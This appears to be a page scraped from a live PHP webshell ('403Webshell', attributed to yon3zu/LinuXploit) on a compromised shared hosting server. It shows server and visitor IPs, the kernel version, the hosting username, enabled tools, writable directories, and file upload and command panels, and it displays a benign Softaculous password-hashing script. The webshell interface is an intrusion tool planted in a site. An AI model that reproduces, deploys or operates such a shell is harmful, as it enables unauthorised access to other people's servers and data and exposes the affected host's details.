403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.133.123.148
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/softaculous/procwire/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/softaculous/procwire/update_pass.php
<?php

$salt_config = md5(mt_rand() . microtime(true));
echo $salt_db = '$2y$11$'.__randomBase64String(22);
echo '<SOFTACULOUS>';
echo $pass = substr(crypt('[[admin_pass]]' . '[[salt_config]]', $salt_db), 29);
		
function __randomBase64String($requiredLength = 22) {

	$buffer = '';
	$rawLength = (int) ($requiredLength * 3 / 4 + 1);
	$valid = false;

	if(function_exists('mcrypt_create_iv')) {
		$buffer = mcrypt_create_iv($rawLength, MCRYPT_DEV_URANDOM);
		if($buffer) $valid = true;
	}

	if(!$valid && function_exists('openssl_random_pseudo_bytes')) {
		$buffer = openssl_random_pseudo_bytes($rawLength);
		if($buffer) $valid = true;
	}

	if(!$valid || strlen($buffer) < $rawLength) {
		$bl = strlen($buffer);
		for($i = 0; $i < $rawLength; $i++) {
			if($i < $bl) {
				$buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255));
			} else {
				$buffer .= chr(mt_rand(0, 255));
			}
		}
	}

	$salt = str_replace('+', '.', base64_encode($buffer));
	$salt = substr($salt, 0, $requiredLength);

	$salt .= $valid; 

	return $salt;
}

@unlink('update_pass.php');

?>

Youez - 2016 - github.com/yon3zu
LinuXploit